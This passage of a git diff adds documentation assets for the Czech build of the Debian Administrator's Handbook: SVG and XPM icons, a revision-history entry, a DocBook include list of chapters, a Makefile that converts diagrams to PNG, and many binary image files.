0,1.88068 2.17454,2.76225 3.2912,2.76225 1.23419,0 1.58682,-0.64648 1.88068,-1.6456 1.29297,-4.34907 3.7026,-5.75959 6.05345,-5.75959 2.29208,0 4.99556,1.17544 4.99556,5.87714 l 0,2.46839 c -1.46928,1.52806 -7.17011,2.99734 -11.81304,4.46662 -4.23153,1.29297 -5.46573,4.23154 -5.46573,6.99379 0,4.40785 2.93857,8.34553 8.46307,8.34553 3.64382,-0.11754 6.87625,-2.29208 8.75693,-3.52628 0.8228,2.17454 1.76314,3.52628 3.82014,3.52628 2.17453,0 4.7017,-0.64648 6.93501,-1.76314 l -0.35262,-1.41051 c -0.8228,0.17631 -2.11577,0.29386 -2.99734,0.0588 -1.05789,-0.23508 -2.057,-1.35174 -2.057,-5.05433 l 0,-14.22267 m 38.36187,1.52806 c 0,-5.9359 -3.23243,-9.34464 -8.63939,-9.34464 -4.34907,0 -7.05256,2.11577 -10.69638,4.46662 l -0.8228,-4.46662 -8.75693,1.46928 0,1.46928 2.23331,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,18.51297 c 0,2.99733 -0.17631,3.11488 -4.40785,3.40874 l 0,1.70437 14.34021,0 0,-1.70437 c -4.17276,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-13.75249 c 0,-1.46928 0.11754,-2.29208 0.58771,-3.23243 1.2342,-2.29207 3.87891,-4.23153 6.99379,-4.23153 3.99645,0 6.17099,2.23331 6.17099,7.34642 l 0,13.87003 c 0,2.99733 -0.17632,3.11488 -4.40785,3.40874 l 0,1.70437 14.34021,0 0,-1.70437 c -4.17276,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-15.04546"
+     id="path6354"
+     style="font-size:58.77133179px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;line-height:125%;writing-mode:lr-tb;text-anchor:start;opacity:0.49038463;fill:url(#linearGradient6356);fill-opacity:1;stroke:none;filter:url(#filter6426);font-family:Utopia;-inkscape-font-specification:Utopia" />
+  <g
+     transform="translate(-58.623593,-52.746766)"
+     id="layer1" />
+  <g
+     transform="translate(-58.623593,-52.746766)"
+     id="layer2"
+     style="filter:url(#filter6626)" />
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/warning.png b/tmp/cs-CZ/xml/Common_Content/images/warning.png
new file mode 100644
index 000000000..94b69d1ff
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/warning.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/warning.svg b/tmp/cs-CZ/xml/Common_Content/images/warning.svg
new file mode 100644
index 000000000..4231e5ac0
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/warning.svg
@@ -0,0 +1,130 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+<svg
+   xmlns:dc="http://purl.org/dc/elements/1.1/"
+   xmlns:cc="http://creativecommons.org/ns#"
+   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   xmlns:xlink="http://www.w3.org/1999/xlink"
+   xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
+   xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
+   version="1.0"
+   width="48"
+   height="48"
+   id="svg5921"
+   sodipodi:version="0.32"
+   inkscape:version="0.46"
+   sodipodi:docname="warning.svg"
+   inkscape:output_extension="org.inkscape.output.svg.inkscape">
+  <metadata
+     id="metadata11">
+    <rdf:RDF>
+      <cc:Work
+         rdf:about="">
+        <dc:format>image/svg+xml</dc:format>
+        <dc:type
+           rdf:resource="http://purl.org/dc/dcmitype/StillImage" />
+      </cc:Work>
+    </rdf:RDF>
+  </metadata>
+  <sodipodi:namedview
+     inkscape:window-height="975"
+     inkscape:window-width="1680"
+     inkscape:pageshadow="2"
+     inkscape:pageopacity="0.0"
+     guidetolerance="10.0"
+     gridtolerance="10.0"
+     objecttolerance="10.0"
+     borderopacity="1.0"
+     bordercolor="#666666"
+     pagecolor="#ffffff"
+     id="base"
+     showgrid="false"
+     inkscape:zoom="1"
+     inkscape:cx="49.390126"
+     inkscape:cy="6.0062258"
+     inkscape:window-x="0"
+     inkscape:window-y="25"
+     inkscape:current-layer="svg5921" />
+  <defs
+     id="defs5923">
+    <linearGradient
+       inkscape:collect="always"
+       id="linearGradient2400">
+      <stop
+         style="stop-color:#fac521;stop-opacity:1;"
+         offset="0"
+         id="stop2402" />
+      <stop
+         style="stop-color:#fde7a3;stop-opacity:1"
+         offset="1"
+         id="stop2404" />
+    </linearGradient>
+    <inkscape:perspective
+       sodipodi:type="inkscape:persp3d"
+       inkscape:vp_x="0 : 20 : 1"
+       inkscape:vp_y="0 : 1000 : 0"
+       inkscape:vp_z="40 : 20 : 1"
+       inkscape:persp3d-origin="20 : 13.333333 : 1"
+       id="perspective13" />
+    <inkscape:perspective
+       id="perspective2396"
+       inkscape:persp3d-origin="24 : 16 : 1"
+       inkscape:vp_z="48 : 24 : 1"
+       inkscape:vp_y="0 : 1000 : 0"
+       inkscape:vp_x="0 : 24 : 1"
+       sodipodi:type="inkscape:persp3d" />
+    <inkscape:perspective
+       id="perspective2394"
+       inkscape:persp3d-origin="372.04724 : 350.78739 : 1"
+       inkscape:vp_z="744.09448 : 526.18109 : 1"
+       inkscape:vp_y="0 : 1000 : 0"
+       inkscape:vp_x="0 : 526.18109 : 1"
+       sodipodi:type="inkscape:persp3d" />
+    <linearGradient
+       inkscape:collect="always"
+       xlink:href="#linearGradient2400"
+       id="linearGradient2406"
+       x1="-2684.8242"
+       y1="1639.8413"
+       x2="-2684.8242"
+       y2="1587.1559"
+       gradientUnits="userSpaceOnUse" />
+  </defs>
+  <g
+     transform="matrix(0.4536635,0,0,0.4536635,-5.1836431,-4.6889387)"
+     id="layer1">
+    <g
+       transform="translate(2745.6887,-1555.5977)"
+       id="g8304"
+       style="enable-background:new" />
+  </g>
+  <g
+     id="g3189"
+     transform="matrix(1.2987724,0,0,1.2987724,-1.4964485,-1.8271549)">
+    <path
+       style="opacity:1;fill:#2e3436;fill-opacity:1;stroke:none;stroke-opacity:1;enable-background:new"
+       id="path8034"
+       transform="matrix(0.3735251,4.0822414e-3,-4.0822414e-3,0.3735251,605.96125,-374.33682)"
+       d="M -1603,1054.4387 L -1577.0919,1027.891 L -1540,1027.4387 L -1513.4523,1053.3468 L -1513,1090.4387 L -1538.9081,1116.9864 L -1576,1117.4387 L -1602.5477,1091.5306 L -1603,1054.4387 z" />
+    <path
+       style="opacity:1;fill:url(#linearGradient2406);fill-opacity:1;stroke:none;stroke-width:0.72954363000000000;stroke-opacity:1;enable-background:new"
+       id="path8036"
+       d="M -2723.6739,1596.2775 L -2704.5623,1577.1175 L -2677.5001,1577.0833 L -2658.3401,1596.1949 L -2658.3059,1623.257 L -2677.4175,1642.417 L -2704.4797,1642.4513 L -2723.6396,1623.3396 L -2723.6739,1596.2775 z"
+       transform="matrix(0.4536635,0,0,0.4536635,1240.4351,-710.40684)" />
+    <path
+       transform="translate(6.7837002e-6,-8.8630501e-6)"
+       id="path3178"
+       d="M 13.46875,5.0625 L 4.8125,13.78125 L 4.8125,16.625 L 13.46875,7.9375 L 25.75,7.90625 L 34.4375,16.59375 L 34.4375,13.71875 L 25.75,5.0625 L 13.46875,5.0625 z"
+       style="opacity:1;fill:#fde8a6;fill-opacity:1;stroke:none;stroke-width:0.72954363;stroke-opacity:1;enable-background:new" />
+    <path
+       id="path4412"
+       style="fill:#fef2cb;fill-opacity:1;stroke:#fef2cb;stroke-width:0.9430126;stroke-linecap:round;stroke-linejoin:round;stroke-opacity:1"
+       d="M 23.308501,28.806303 C 23.308501,30.239154 22.087319,31.313792 20.231121,31.313792 L 20.198559,31.313792 C 18.358657,31.313792 17.121188,30.239154 17.121188,28.806303 C 17.121188,27.308327 18.391219,26.282537 20.231121,26.282537 C 22.054757,26.282537 23.27593,27.308327 23.308501,28.806303 z M 22.982851,24.507759 L 24.057489,11.351592 L 16.355915,11.351592 L 17.430553,24.507759 L 22.982851,24.507759 z" />
+    <path
+       id="path4414"
+       style="fill:#2e3436"
+       d="M 22.732962,27.86025 C 22.732962,29.293101 21.51178,30.36774 19.655592,30.36774 L 19.623029,30.36774 C 17.783118,30.36774 16.545659,29.293101 16.545659,27.86025 C 16.545659,26.362275 17.81568,25.336485 19.655592,25.336485 C 21.479218,25.336485 22.7004,26.362275 22.732962,27.86025 z M 22.407312,23.561697 L 23.48195,10.40553 L 15.780385,10.40553 L 16.855023,23.561697 L 22.407312,23.561697 z" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/watermark-draft.png b/tmp/cs-CZ/xml/Common_Content/images/watermark-draft.png
new file mode 100644
index 000000000..d98d95a8f
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/watermark-draft.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/yellow.png b/tmp/cs-CZ/xml/Common_Content/images/yellow.png
new file mode 100644
index 000000000..223865d77
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/yellow.png differ
diff --git a/tmp/cs-CZ/xml/Revision_History.xml b/tmp/cs-CZ/xml/Revision_History.xml
new file mode 100644
index 000000000..73d87aa53
--- /dev/null
+++ b/tmp/cs-CZ/xml/Revision_History.xml
@@ -0,0 +1,23 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE appendix PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<appendix lang="cs-CZ">
+	<title>Revision History</title>
+	 <simpara>
+		<revhistory>
+			<revision>
+				<revnumber>1.0-1</revnumber>
+				 <date>2012-04-01</date>
+				 <author>
+					<firstname>Raphaël</firstname>
+					 <surname>Hertzog</surname>
+					 <email>hertzog@debian.org</email>
+				</author>
+
+			</revision>
+
+		</revhistory>
+
+	</simpara>
+</appendix>
+
diff --git a/tmp/cs-CZ/xml/debian-handbook.xml b/tmp/cs-CZ/xml/debian-handbook.xml
new file mode 100644
index 000000000..b6eb9ca57
--- /dev/null
+++ b/tmp/cs-CZ/xml/debian-handbook.xml
@@ -0,0 +1,29 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<book id="the-debian-administrators-handbook" lang="cs-CZ">
+	<xi:include href="Book_Info.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="00a_preface.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="00b_foreword.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="01_the-debian-project.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="02_case-study.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="03_existing-setup.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="04_installation.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="05_packaging-system.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="06_apt.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="07_solving-problems.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="08_basic-configuration.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="09_unix-services.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="10_network-infrastructure.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="11_network-services.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="12_advanced-administration.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="13_workstation.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="14_security.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="15_debian-packaging.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="70_conclusion.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="90_derivative-distributions.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="92_short-remedial-course.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="99_backcover.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <xi:include href="99_website.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+</book>
+
diff --git a/tmp/cs-CZ/xml/images/Makefile b/tmp/cs-CZ/xml/images/Makefile
new file mode 100644
index 000000000..112420b8b
--- /dev/null
+++ b/tmp/cs-CZ/xml/images/Makefile
@@ -0,0 +1,17 @@
+
+dia = $(wildcard *.dia)
+
+all: png
+
+png: $(patsubst %.dia,%.png,$(dia))
+
+eps: $(patsubst %.jpg,%.eps,$(wildcard *.jpg)) $(patsubst %.png,%.eps,$(wildcard *.png)) $(patsubst %.dia,%.eps,$(dia))
+
+define DIA_template
+$(1).png: $(1).dia
+	dia -t png -s 1024 $$<
+endef
+
+$(foreach d,$(patsubst %.dia,%,$(dia)),$(eval $(call DIA_template,$(d))))
+
+.PHONY: png all
diff --git a/tmp/cs-CZ/xml/images/apple.xpm b/tmp/cs-CZ/xml/images/apple.xpm
new file mode 100644
index 000000000..bd976feb5
--- /dev/null
+++ b/tmp/cs-CZ/xml/images/apple.xpm
@@ -0,0 +1,34 @@
+/* XPM */
+static char * apple_xpm[] = {
+"28 24 7 1",
+" 	c #ff9ebe",
+".	c #3c9e3c",
+"X	c #ffff00",
+"o	c #ffbe7d",
+"O	c #ff0000",
+"+	c #7d3cbe",
+"@	c #0000ff",
+"               ....         ",
+"              ....          ",
+"              ....          ",
+"              ...           ",
+"        ..    .   ..        ",
+"      ......    ......      ",
+"     ..................     ",
+"     ..................     ",
+"    XXXXXXXXXXXXXXXXX       ",
+"    XXXXXXXXXXXXXXXX        ",
+"    XXXXXXXXXXXXXXXX        ",
+"    oooooooooooooooo        ",
+"    oooooooooooooooo        ",
+"    oooooooooooooooo        ",
+"    OOOOOOOOOOOOOOOOO       ",
+"     OOOOOOOOOOOOOOOOO      ",
+"     OOOOOOOOOOOOOOOOOO     ",
+"     +++++++++++++++++      ",
+"      ++++++++++++++++      ",
+"      +++++++++++++++       ",
+"       @@@@@@@@@@@@@@       ",
+"        @@@@@@@@@@@@        ",
+"          @@    @@          ",
+"                            "};
diff --git a/tmp/cs-CZ/xml/images/aptitude.png b/tmp/cs-CZ/xml/images/aptitude.png
new file mode 100644
index 000000000..f9cfb9efe
Binary files /dev/null and b/tmp/cs-CZ/xml/images/aptitude.png differ
diff --git a/tmp/cs-CZ/xml/images/autobuilder.dia b/tmp/cs-CZ/xml/images/autobuilder.dia
new file mode 100644
index 000000000..2fa55396c
Binary files /dev/null and b/tmp/cs-CZ/xml/images/autobuilder.dia differ
diff --git a/tmp/cs-CZ/xml/images/autobuilder.png b/tmp/cs-CZ/xml/images/autobuilder.png
new file mode 100644
index 000000000..575ef330d
Binary files /dev/null and b/tmp/cs-CZ/xml/images/autobuilder.png differ
diff --git a/tmp/cs-CZ/xml/images/bsdcpu.xpm b/tmp/cs-CZ/xml/images/bsdcpu.xpm
new file mode 100644
index 000000000..832b780bc
--- /dev/null
+++ b/tmp/cs-CZ/xml/images/bsdcpu.xpm
@@ -0,0 +1,60 @@
+/* XPM */
+static char * bsdcpu_xpm[] = {
+"55 45 11 1",
+"      c #888888",
+".     c None",
+"X     c #cccccc",
+"o     c #bbbbbb",
+"O     c #000000",
+"+     c #eeeeee",
+"@     c #cd5c5c",
+"#     c #32cd32",
+"$     c #999999",
+"%     c #666666",
+"&     c #555555",
+"                                    ...................",
+" XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ...................",
+" XooooooooooooooooooooooooooooooooX ...................",
+" Xo                              oX ...................",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ...................",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ...................",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX .....          ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +@@+###+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +@O+##O+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +oooooo+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +oOoooo+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +oOoooo+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +oooooo+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +oOoooo+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +oOoooo+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +$$$$$$+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +$$$$$$+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo                              oX ..... +$$$$$$+ ....",
+" XooooooooooooooooooooooooooooooooX ..... ++++++++ ....",
+" XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX .....          ....",
+"                                    ..... oooooooo ....",
+"... % % % % % % % % % % % % % % %........ oooooooo ....",
+"... % % % % % % % % % % % % % % %........          ....",
+"......&&%%%%%%%%%%%%%%%%%%%%&&............        .....",
+"......&&&&&%%%%%%%%%%%%%%&&&&&.........................",
+"                                     ......   .........",
+" XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX .  ... ... ........",
+" Xo+++++++++++++++++++oooXXXXXooooX ...   .       .....",
+" Xoo+++++++++++++++++++ooXXoXX+++oX ....... X X X .....",
+" Xoooo+++++++++++++++ooooXoooX+++oX ....... X X X .....",
+" X$$$$$$$$$$$$$$$$$$$$$$$X$$$X$$$$X .......       .....",
+" XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ....... XXXXX .....",
+" oooooooooooooooooooooooooooooooooo ....... XXXXX .....",
+"                                    .......       ....."};
+
diff --git a/tmp/cs-CZ/xml/images/case-study.dia b/tmp/cs-CZ/xml/images/case-study.dia
new file mode 100644
index 000000000..9e65a8775
Binary files /dev/null and b/tmp/cs-CZ/xml/images/case-study.dia differ
diff --git a/tmp/cs-CZ/xml/images/case-study.png b/tmp/cs-CZ/xml/images/case-study.png
new file mode 100644
index 000000000..8d1e14b2d
Binary files /dev/null and b/tmp/cs-CZ/xml/images/case-study.png differ
diff --git a/tmp/cs-CZ/xml/images/chap-advanced-administration.png b/tmp/cs-CZ/xml/images/chap-advanced-administration.png
new file mode 100644
index 000000000..392045bf9
Binary files /dev/null and b/tmp/cs-CZ/xml/images/chap-advanced-administration.png differ
diff --git a/tmp/cs-CZ/xml/images/chap-apt.png b/tmp/cs-CZ/xml/images/chap-apt.png
new file mode 100644
index 000000000..493eb5808
Binary files /dev/null and b/tmp/cs-CZ/xml/images/chap-apt.png differ
diff --git a/tmp/cs-CZ/xml/images/chap-basic-configuration.png b/tmp/cs-CZ/xml/images/chap-basic-configuration.png
new file mode 100644
index 000000000..7d48ab683
Binary files /dev/null and b/tmp/cs-CZ/xml/images/chap-basic-configuration.png differ
diff --git a/tmp/cs-CZ/xml/images/chap-case-study.png b/tmp/cs-CZ/xml/images/chap-case-study.png
new file mode 100644
index 000000000..379523300
Binary files /dev/null and b/tmp/cs-CZ/xml/images/chap-case-study.png differ
diff --git a/tmp/cs-CZ/xml/images/chap-conclusion.png b/tmp/cs-CZ/xml/images/chap-conclusion.png
new file mode 100644
index 000000000..8603f73ff
Binary files /dev/null and b/tmp/cs-CZ/xml/images/chap-conclusion.png differ
diff --git a/tmp/cs-CZ/xml/images/chap-debian-packaging.png b/tmp/cs-CZ/xml/images/chap-debian-packaging.png
new file mode 100644
index 000000000..830cb3b7a
Binary files /dev/null and b/tmp/cs-CZ/xml/images/chap-debian-packaging.png differ
diff --git a/tmp/cs-CZ/xml/images/chap-derivative-distributions.png b/tmp/cs-CZ/xml/images/chap-derivative-distributions.png
new file mode 100644
index 000000000..22051ec06
Binary files /dev/null and b/tmp/cs-CZ/xml/images/chap-derivative-distributions.png differ
diff --git a/tmp/cs-CZ/xml/images/chap-existing-setup.png b/tmp/cs-CZ/xml/images/chap-existing-setup.png
new file mode 100644
index 000000000..dd99621f1
Binary files /dev/null and b/tmp/cs-CZ/xml/images/chap-existing-setup.png differ
diff --git a/tmp/cs-CZ/xml/images/chap-installation.png b/tmp/cs-CZ/xml/images/chap-installation.png
new file mode 100644
index 000000000..16ab65980
Binary files /dev/null and b/tmp/cs-CZ/xml/images/chap-installation.png differ
diff --git a/tmp/cs-CZ/xml/images/chap-network-infrastructure.png b/tmp/cs-CZ/xml/images/chap-network-infrastructure.png
new file mode 100644
index 000000000..cb6775d3c
Binary files /dev/null and b/tmp/cs-CZ/xml/images/chap-network-infrastructure.png differ
diff --git a/tmp/cs-CZ/xml/images/chap-network-services.png b/tmp/cs-CZ/xml/images/chap-network-services.png
new file mode 100644
index 000000000..c74c3df36
Binary files /dev/null and b/tmp/cs-CZ/xml/images/chap-network-services.png differ
diff --git a/tmp/cs-CZ/xml/images/chap-packaging-system.png b/tmp/cs-CZ/xml/images/chap-packaging-system.png
new file mode 100644
index 000000000..538474b86
Binary files /dev/null and b/tmp/cs-CZ/xml/images/chap-packaging-system.png differ
diff --git a/tmp/cs-CZ/xml/images/chap-security.png b/tmp/cs-CZ/xml/images/chap-security.png
new file mode 100644
index 000000000..43c2bb605
Binary files /dev/null and b/tmp/cs-CZ/xml/images/chap-security.png differ
diff --git a/tmp/cs-CZ/xml/images/chap-short-remedial-course.png b/tmp/cs-CZ/xml/images/chap-short-remedial-course.png
new file mode 100644
index 000000000..3293f610e
Binary files /dev/null and b/tmp/cs-CZ/xml/images/chap-short-remedial-course.png differ
diff --git a/tmp/cs-CZ/xml/images/chap-solving-problems.png b/tmp/cs-CZ/xml/images/chap-solving-problems.png
new file mode 100644
index 000000000..793045299
Binary files /dev/null and b/tmp/cs-CZ/xml/images/chap-solving-problems.png differ
diff --git a/tmp/cs-CZ/xml/images/chap-the-debian-project.png b/tmp/cs-CZ/xml/images/chap-the-debian-project.png
new file mode 100644
index 000000000..4b75ba44c
Binary files /dev/null and b/tmp/cs-CZ/xml/images/chap-the-debian-project.png differ
diff --git a/tmp/cs-CZ/xml/images/chap-unix-services.png b/tmp/cs-CZ/xml/images/chap-unix-services.png
new file mode 100644
index 000000000..fe71ddc4b
Binary files /dev/null and b/tmp/cs-CZ/xml/images/chap-unix-services.png differ
diff --git a/tmp/cs-CZ/xml/images/chap-workstation.png b/tmp/cs-CZ/xml/images/chap-workstation.png
new file mode 100644
index 000000000..395f60de6
Binary files /dev/null and b/tmp/cs-CZ/xml/images/chap-workstation.png differ
diff --git a/tmp/cs-CZ/xml/images/cover.jpg b/tmp/cs-CZ/xml/images/cover.jpg
new file mode 100644
index 000000000..63f98f34d
Binary files /dev/null and b/tmp/cs-CZ/xml/images/cover.jpg differ
diff --git a/tmp/cs-CZ/xml/images/debian.png b/tmp/cs-CZ/xml/images/debian.png
new file mode 100644
index 000000000..7acde5f1d
Binary files /dev/null and b/tmp/cs-CZ/xml/images/debian.png differ
diff --git a/tmp/cs-CZ/xml/images/debian.xpm b/tmp/cs-CZ/xml/images/debian.xpm
new file mode 100644
index 000000000..e65d6697b
--- /dev/null
+++ b/tmp/cs-CZ/xml/images/debian.xpm
@@ -0,0 +1,44 @@
+/* XPM */
+static char * debian_xpm[] = {
+"28 24 17 1",
+" 	c None",
+".	c #BE073B",
+"+	c #C43761",
+"@	c #D26486",
+"#	c #DC92A9",
+"$	c #E3AEBF",
+"%	c #E9BFCD",
+"&	c #EECFDA",
+"*	c #F4DEE5",
+"=	c #F6E6ED",
+"-	c #F7EDF1",
+";	c #C12855",
+">	c #C63E66",
+",	c #FEFEFE",
+"'	c #D37895",
+")	c #BE1C4A",
+"!	c #CB5276",
+",,,,,,,,,,,,,,,,,,,,,,,,,,,,",
+",,,,,,,,,,,%@!'#$-,,,,,,,,,,",
+",,,,,,,,,&>......)>$,,,,,,,,",
+",,,,,,,,#...!#$$#+..@,,,,,,,",
+",,,,,,,#..!%,,,,,,'..',,,,,,",
+",,,,,-=))#,,,,,,,,,'..%,,,,,",
+",,,,,-@.%,,,,,,,,,,-;+$,,,,,",
+",,,,,%.#,,,,,$@'$*,,'.&,,,,,",
+",,,,,'.*,,,,$#,,,-,,$.&,,,,,",
+",,,,,!!,,,,,',,,,,,,%.%,,,,,",
+",,,,,!',,,,*',,,,,-,$)=,,,,,",
+",,,,,!#,,,,*!,,,,&-,#!-,,,,,",
+",,,,,!#,,,,,+-,-*-,=)%,,,,,,",
+",,,,,@!,,,,*#!-,,,&+$,,,,,,,",
+",,,,,#;,,,,,&'+'#!>%,,,,,,,,",
+",,,,,&.',,,,,-$##*,,,,,,,,,,",
+",,,,,,>.*,,,,,,,,,,,,,,,,,,,",
+",,,,,,%.#,,,,,,,,,,,,,,,,,,,",
+",,,,,,,@;-,,,,,,,,,,,,,,,,,,",
+",,,,,,,-+!,,,,,,,,,,,,,,,,,,",
+",,,,,,,,-+!-,,,,,,,,,,,,,,,,",
+",,,,,,,,,-'!%,,,,,,,,,,,,,,,",
+",,,,,,,,,,,&'$%,,,,,,,,,,,,,",
+",,,,,,,,,,,,,,,,,,,,,,,,,,,,"};
diff --git a/tmp/cs-CZ/xml/images/developers-map.png b/tmp/cs-CZ/xml/images/developers-map.png
new file mode 100644
index 000000000..7185c7bd2
Binary files /dev/null and b/tmp/cs-CZ/xml/images/developers-map.png differ
diff --git a/tmp/cs-CZ/xml/images/evolution.png b/tmp/cs-CZ/xml/images/evolution.png
new file mode 100644
index 000000000..4ae92f887
Binary files /dev/null and b/tmp/cs-CZ/xml/images/evolution.png differ
diff --git a/tmp/cs-CZ/xml/images/existing-setup-1.dia b/tmp/cs-CZ/xml/images/existing-setup-1.dia
new file mode 100644
index 000000000..7854e568d
Binary files /dev/null and b/tmp/cs-CZ/xml/images/existing-setup-1.dia differ
diff --git a/tmp/cs-CZ/xml/images/existing-setup-1.png b/tmp/cs-CZ/xml/images/existing-setup-1.png
new file mode 100644
index 000000000..838c92521
Binary files /dev/null and b/tmp/cs-CZ/xml/images/existing-setup-1.png differ
diff --git a/tmp/cs-CZ/xml/images/existing-setup-2.dia b/tmp/cs-CZ/xml/images/existing-setup-2.dia
new file mode 100644
index 000000000..4198a9ab7
Binary files /dev/null and b/tmp/cs-CZ/xml/images/existing-setup-2.dia differ
diff --git a/tmp/cs-CZ/xml/images/existing-setup-2.png b/tmp/cs-CZ/xml/images/existing-setup-2.png
new file mode 100644
index 000000000..8b44b206b
Binary files /dev/null and b/tmp/cs-CZ/xml/images/existing-setup-2.png differ
diff --git a/tmp/cs-CZ/xml/images/existing-setup-4.dia b/tmp/cs-CZ/xml/images/existing-setup-4.dia
new file mode 100644
index 000000000..1ff98b687
Binary files /dev/null and b/tmp/cs-CZ/xml/images/existing-setup-4.dia differ
diff --git a/tmp/cs-CZ/xml/images/existing-setup-4.png b/tmp/cs-CZ/xml/images/existing-setup-4.png
new file mode 100644
index 000000000..ae984be20
Binary files /dev/null and b/tmp/cs-CZ/xml/images/existing-setup-4.png differ
diff --git a/tmp/cs-CZ/xml/images/firefox.png b/tmp/cs-CZ/xml/images/firefox.png
new file mode 100644
index 000000000..ef2cd5448
Binary files /dev/null and b/tmp/cs-CZ/xml/images/firefox.png differ
diff --git a/tmp/cs-CZ/xml/images/fwbuilder.png b/tmp/cs-CZ/xml/images/fwbuilder.png
new file mode 100644
index 000000000..78207f1e6
Binary files /dev/null and b/tmp/cs-CZ/xml/images/fwbuilder.png differ
diff --git a/tmp/cs-CZ/xml/images/gnome-mime-application-x-deb.png b/tmp/cs-CZ/xml/images/gnome-mime-application-x-deb.png
new file mode 100644
index 000000000..14b96768d
Binary files /dev/null and b/tmp/cs-CZ/xml/images/gnome-mime-application-x-deb.png differ
diff --git a/tmp/cs-CZ/xml/images/gnome-packagekit.png b/tmp/cs-CZ/xml/images/gnome-packagekit.png
new file mode 100644
index 000000000..2ec096591
